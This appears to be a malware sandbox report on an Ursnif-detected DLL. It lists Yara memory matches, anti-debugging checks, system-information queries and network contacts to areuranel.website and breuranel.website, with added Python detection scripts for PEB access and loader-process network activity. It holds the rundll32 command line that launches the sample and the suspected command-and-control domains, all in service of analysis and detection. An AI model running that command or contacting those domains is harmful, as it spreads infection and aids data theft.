                      Source: Yara match File source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
                      Source: Yara match File source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: WerFault.exe, 00000013.00000003.524969424.0000000004A35000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                      Source: WerFault.exe, 00000012.00000002.526051488.0000000005320000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.524764769.0000000004A1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.545662496.0000000004CD8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 00000017.00000002.545508557.0000000004C02000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW~
                      Source: WerFault.exe, 00000012.00000002.526349700.0000000005348000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED26CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE1DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED3C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED48861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED8DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED8DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED8DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED3C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED48861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED8DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED8DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED8DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED26CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED1B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED26CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED1B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
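The fs:[30h] reads and the DebugPort queries listed above are the two classic PEB and debugger checks: fs:[30h] is the PEB pointer in a 32-bit TEB, and the bytes that follow decide whether the code is testing PEB.BeingDebugged (offset 2) or PEB.NtGlobalFlag (offset 0x68). The Python below is an added example, not code from the report or the sample: it scans raw x86 code bytes for the two PEB-access encodings the report shows, `mov reg, dword ptr fs:[30h]` and `push dword ptr fs:[30h]`, and when the pointer lands in EAX looks a few bytes ahead for the field being read. The byte patterns are standard x86 encodings; the sample buffer is constructed for the demonstration. It is a linear byte matcher, not a disassembler, so hits are leads to confirm in a disassembler.

```python
"""Static scan for 32-bit x86 PEB-access idioms (mov reg, fs:[30h] / push fs:[30h])
and the PEB field that is read next. Added example; the byte patterns are standard
x86 encodings and the sample buffer is constructed."""
from __future__ import annotations

FS_PREFIX = 0x64                      # segment override: FS; fs:[30h] is TEB.ProcessEnvironmentBlock
PEB_DISP = (0x30).to_bytes(4, "little")
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Exact follow-up encodings once the PEB pointer is in EAX (the form the report lists).
FOLLOWUPS = {
    b"\x80\x78\x02\x00": "cmp byte ptr [eax+2], 0 ; PEB.BeingDebugged",
    b"\x0f\xb6\x40\x02": "movzx eax, byte ptr [eax+2] ; PEB.BeingDebugged",
    b"\x8a\x40\x02": "mov al, byte ptr [eax+2] ; PEB.BeingDebugged",
    b"\x8b\x40\x68": "mov eax, dword ptr [eax+68h] ; PEB.NtGlobalFlag",
    b"\xf6\x40\x68\x70": "test byte ptr [eax+68h], 70h ; PEB.NtGlobalFlag (heap debug flags)",
    b"\x8b\x40\x0c": "mov eax, dword ptr [eax+0Ch] ; PEB.Ldr (module list walk)",
}


def decode_peb_access(buf: bytes, i: int):
    """Return (length, mnemonic, dest_register) if buf[i:] starts with a PEB read, else None."""
    if buf[i] != FS_PREFIX or len(buf) < i + 6:
        return None
    opcode = buf[i + 1]
    if opcode == 0xA1 and buf[i + 2:i + 6] == PEB_DISP:        # 64 A1 30 00 00 00
        return 6, "mov eax, dword ptr fs:[30h]", "eax"
    if len(buf) < i + 7 or buf[i + 3:i + 7] != PEB_DISP:
        return None
    modrm = buf[i + 2]
    if modrm & 0xC7 != 0x05:                                    # mod=00, r/m=101 -> [disp32]
        return None
    reg = (modrm >> 3) & 7
    if opcode == 0x8B:                                          # 64 8B /r 30 00 00 00
        return 7, f"mov {REGS[reg]}, dword ptr fs:[30h]", REGS[reg]
    if opcode == 0xFF and reg == 6:                             # 64 FF 35 30 00 00 00 (push r/m32)
        return 7, "push dword ptr fs:[30h]", None
    return None


def scan_peb_access(buf: bytes, window: int = 16):
    """Return a list of (offset, mnemonic, peb_field_or_None) for every PEB read in buf."""
    hits = []
    i = 0
    while i < len(buf):
        decoded = decode_peb_access(buf, i)
        if decoded is None:
            i += 1
            continue
        length, mnemonic, reg = decoded
        field = None
        if reg == "eax":                                        # only EAX-based follow-ups are modelled
            tail = buf[i + length:i + length + window]
            field = next((desc for pat, desc in FOLLOWUPS.items() if pat in tail), None)
        hits.append((i, mnemonic, field))
        i += length
    return hits


# Constructed sample: a BeingDebugged check, two other PEB loads, then an NtGlobalFlag check.
SAMPLE_CODE = (
    b"\x55\x8b\xec"                    # push ebp ; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"        # mov eax, dword ptr fs:[30h]
    b"\x0f\xb6\x40\x02"                # movzx eax, byte ptr [eax+2]   (BeingDebugged)
    b"\x85\xc0\x75\x05"                # test eax, eax ; jnz +5
    b"\x64\x8b\x0d\x30\x00\x00\x00"    # mov ecx, dword ptr fs:[30h]
    b"\x64\xff\x35\x30\x00\x00\x00"    # push dword ptr fs:[30h]
    b"\x64\xa1\x30\x00\x00\x00"        # mov eax, dword ptr fs:[30h]
    b"\x8b\x40\x68"                    # mov eax, dword ptr [eax+68h]   (NtGlobalFlag)
    b"\xa9\x70\x00\x00\x00"            # test eax, 70h
    b"\xc3"                            # ret
)

if __name__ == "__main__":
    for offset, mnemonic, field in scan_peb_access(SAMPLE_CODE):
        print(f"0x{offset:04x}  {mnemonic:<32} {field or ''}")
```

Run against the raw bytes of the dumped regions (the .sdmp files the Yara section names), the scanner gives the offsets of every fs:[30h] access; the follow-up table only covers the EAX forms, so a load into another register is reported without a field and needs manual follow-up.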

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 52.98.208.66 187
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 40.97.161.50 187
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 40.101.9.178 187
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 13.82.28.61 187
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmp; Binary or memory strings (one observation each): "Shell_TrayWnd", "Progman", "SProgram Managerl", "Shell_TrayWnd,", "Progmanlock"
Source: C:\Windows\System32\loaddll32.exe; Code function: GetLocaleInfoW (2 observations)
Source: C:\Windows\System32\loaddll32.exe; Code function: EnumSystemLocalesW (4 observations)
Source: C:\Windows\System32\loaddll32.exe; Code function: GetUserDefaultLCID, IsValidCodePage, IsValidLocale, GetLocaleInfoW, GetLocaleInfoW
Source: C:\Windows\System32\loaddll32.exe; Code function: GetACP, IsValidCodePage, _wcschr, _wcschr, GetLocaleInfoW
Source: C:\Windows\System32\loaddll32.exe; Code function: GetLocaleInfoW, GetLocaleInfoW, GetACP
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: GetLocaleInfoW (2 observations)
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: EnumSystemLocalesW (4 observations)
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: GetUserDefaultLCID, IsValidCodePage, IsValidLocale, GetLocaleInfoW, GetLocaleInfoW
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: GetACP, IsValidCodePage, _wcschr, _wcschr, GetLocaleInfoW
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: GetLocaleInfoW, GetLocaleInfoW, GetACP
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_0075A82B cpuid
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6ECE1172 GetSystemTimeAsFileTime, _aulldiv, _snwprintf, CreateFileMappingW, GetLastError, GetLastError, MapViewOfFile, GetLastError, CloseHandle, GetLastError
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6ED3FF15 _free, _free, _free, GetTimeZoneInformation, _free
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6ECE1825 CreateEventA, GetVersion, GetCurrentProcessId, OpenProcess, GetLastError
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_0075A82B RtlAllocateHeap, GetUserNameW, RtlAllocateHeap, GetUserNameW, HeapFree, GetComputerNameW, GetComputerNameW, RtlAllocateHeap, GetComputerNameW, HeapFree
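The "System process connects to network" evidence above joins two facts from the process tree: cmd.exe started rundll32.exe with a DLL from the user's Desktop loaded by ordinal (#1), and that rundll32.exe then resolved and connected to both Microsoft properties and the two .website domains. The Python below is an added example, not part of the report, of how a detection rule would make the same join: it walks the parent chain of every connecting process, flags outbound traffic from Windows loader binaries, raises severity when a loader in the chain runs a DLL from a user-writable path and the destination is not on a known-good list, and holds bare IP destinations at medium until the DNS log or ASN resolves them. PIDs 3708 and 6044 and the command lines are the report's; placing PID 5172 under cmd.exe, the parent PID 1000, the explorer.exe decoy, the allow-list and the ports are assumptions made for the example.

```python
"""Detection sketch for 'system process connects to network': join a process tree with a
connection log, flag outbound traffic from Windows loader binaries, and rank it.
Added example modelled on the report; the events below are constructed."""
from __future__ import annotations
from dataclasses import dataclass, field
import ipaddress
import re

# Windows binaries that exist to run other code and should not be initiating traffic themselves.
LOADER_IMAGES = {"rundll32.exe", "loaddll32.exe", "regsvr32.exe", "mshta.exe"}
# Assumed allow-list: the second-level domains the report rated 'high' reputation.
KNOWN_GOOD_SUFFIXES = ("msn.com", "outlook.com", "office365.com", "office.com")
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\", re.IGNORECASE)


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Conn:
    pid: int
    dst: str                 # hostname queried or IP connected to
    port: int | None = None


@dataclass
class Finding:
    pid: int
    image: str
    dst: str
    reasons: list[str] = field(default_factory=list)
    severity: str = "medium"


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, procs: dict[int, Proc]) -> list[Proc]:
    """The process followed by its parents, stopping at unknown PIDs or cycles."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def is_ip(dst: str) -> bool:
    try:
        ipaddress.ip_address(dst)
        return True
    except ValueError:
        return False


def is_known_good(host: str) -> bool:
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in KNOWN_GOOD_SUFFIXES)


def system_process_network_findings(processes, connections) -> list[Finding]:
    procs = {p.pid: p for p in processes}
    findings = []
    for conn in connections:
        chain = ancestry(conn.pid, procs)
        if not chain or basename(chain[0].image) not in LOADER_IMAGES:
            continue
        finding = Finding(conn.pid, chain[0].image, conn.dst,
                          ["outbound connection from a Windows loader binary"])
        # A loader anywhere in the chain that was handed a DLL under \Users\ is the likely injection vector.
        if any(basename(p.image) in LOADER_IMAGES and USER_WRITABLE.search(p.cmdline) for p in chain):
            finding.reasons.append("loader in ancestry runs a DLL from a user-writable path")
        if is_ip(conn.dst):
            finding.reasons.append("bare IP destination; resolve via DNS log or ASN before rating")
        elif not is_known_good(conn.dst):
            finding.reasons.append("destination not on the known-good list")
            finding.severity = "high"
        findings.append(finding)
    return findings


# Constructed events. PIDs 3708/6044 and the command lines follow the report's process tree;
# parent PID 1000, PID 5172's placement under cmd.exe and the explorer.exe decoy are assumptions.
PROCESSES = [
    Proc(3708, 1000, r"C:\Windows\System32\loaddll32.exe", r"loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'"),
    Proc(6044, 3708, r"C:\Windows\SysWOW64\cmd.exe", r"cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1"),
    Proc(5172, 6044, r"C:\Windows\SysWOW64\rundll32.exe", r"rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1"),
    Proc(7001, 1000, r"C:\Windows\explorer.exe", "explorer.exe"),
]
CONNECTIONS = [
    Conn(5172, "areuranel.website"), Conn(5172, "breuranel.website"),
    Conn(5172, "www.msn.com"), Conn(5172, "outlook.office365.com"),
    Conn(5172, "52.98.208.66", 443), Conn(7001, "www.msn.com", 443),
]

if __name__ == "__main__":
    for f in system_process_network_findings(PROCESSES, CONNECTIONS):
        print(f"[{f.severity}] pid={f.pid} {basename(f.image)} -> {f.dst}: " + "; ".join(f.reasons))
```

The allow-list is deliberately narrow: the point of the rule is that rundll32.exe reaching Microsoft domains is still an anomaly worth a medium finding, and the two .website domains on top of it are what push the event to high.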

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match; File source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
Source: Yara match; File source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match; File source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
Source: Yara match; File source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
